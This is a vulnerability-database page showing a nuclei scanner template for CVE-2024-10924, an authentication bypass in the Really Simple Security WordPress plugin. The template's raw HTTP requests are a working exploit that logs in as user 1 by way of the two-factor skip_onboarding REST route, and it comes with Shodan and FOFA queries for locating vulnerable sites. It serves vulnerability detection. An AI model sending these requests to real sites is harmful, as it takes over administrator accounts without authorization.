Lucene search

K

Really Simple Security < 9.1.2 - Authentication Bypass

🗓️ 19 Nov 2024 01:51:44Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 7 Views

Really Simple Security < 9.1.2 - Authentication Bypass in WordPres

Show more
Related
Refs
Code
id: CVE-2024-10924

info:
  name: Really Simple Security < 9.1.2 - Authentication Bypass
  author: yaser_s
  severity: critical
  description: |
    The Really Simple Security (Free, Pro, and Pro Multisite) plugins for WordPress are vulnerable to authentication bypass in versions 9.0.0 to 9.1.1.1. This is due to improper user check error handling in the two-factor REST API actions with the 'check_login_and_get_user' function. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, when the "Two-Factor Authentication" setting is enabled (disabled by default).
  remediation: Fixed in 9.1.2
  reference:
    - https://plugins.trac.wordpress.org/browser/really-simple-ssl/tags/9.1.1.1/security/wordpress/two-fa/class-rsssl-two-factor-on-board-api.php#L277
    - https://plugins.trac.wordpress.org/browser/really-simple-ssl/tags/9.1.1.1/security/wordpress/two-fa/class-rsssl-two-factor-on-board-api.php#L278
    - https://plugins.trac.wordpress.org/browser/really-simple-ssl/tags/9.1.1.1/security/wordpress/two-fa/class-rsssl-two-factor-on-board-api.php#L67
    - https://plugins.trac.wordpress.org/changeset/3188431/really-simple-ssl
    - https://wpscan.com/vulnerability/8e1f4374-2e41-4c27-80d4-db172015c6be/
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/7d5d05ad-1a7a-43d2-bbbf-597e975446be?source=cve
    - https://nvd.nist.gov/vuln/detail/CVE-2024-10924
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-10924
    cwe-id: CWE-288,CWE-306
    epss-score: 0.00101
    epss-percentile: 0.4287
    cpe: cpe:2.3:a:really-simple-plugins:really_simple_security:*:*:*:*:-:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: really-simple-plugins
    product: really_simple_security
    framework: wordpress
    shodan-query: html:"/wp-content/plugins/really-simple-ssl"
    fofa-query: body="/wp-content/plugins/really-simple-ssl"
  tags: cve,cve2024,wp,wp-plugin,wordpress,auth-bypass,really-simple-ssl

flow: http(1) && http(2) && http(3)

http:
  - raw:
      - |
        GET /wp-login.php HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        name: nonce
        part: body_1
        group: 1
        regex:
          - '"nonce":"([a-z0-9]+)"\}'
        internal: true

  - raw:
      - |
        POST /?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
            "user_id": 1,
            "login_nonce": "{{nonce}}",
            "redirect_to": "/wp-admin/"
        }

    matchers:
      - type: word
        part: body
        words:
          - '"redirect_to":"\/wp-admin\/"'
        internal: true

  - raw:
      - |
        GET /wp-admin/profile.php HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'Personal Options'

      - type: word
        part: content_type
        words:
          - 'text/html'
# digest: 490a0046304402204abade2aba55b6eea42a22ccf1591c5d83ea31d23f9f492ab7347d8bba93aba00220193ab92d79c45b7af0695a5f7e846ac7ea1183dce997bc97b0647b1382c3aa8a:922c64590222798bb761d5b6d8e72950

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
19 Nov 2024 01:44Current
6.9Medium risk
Vulners AI Score6.9
CVSS39.8
EPSS0.23
SSVC
7
.json
Report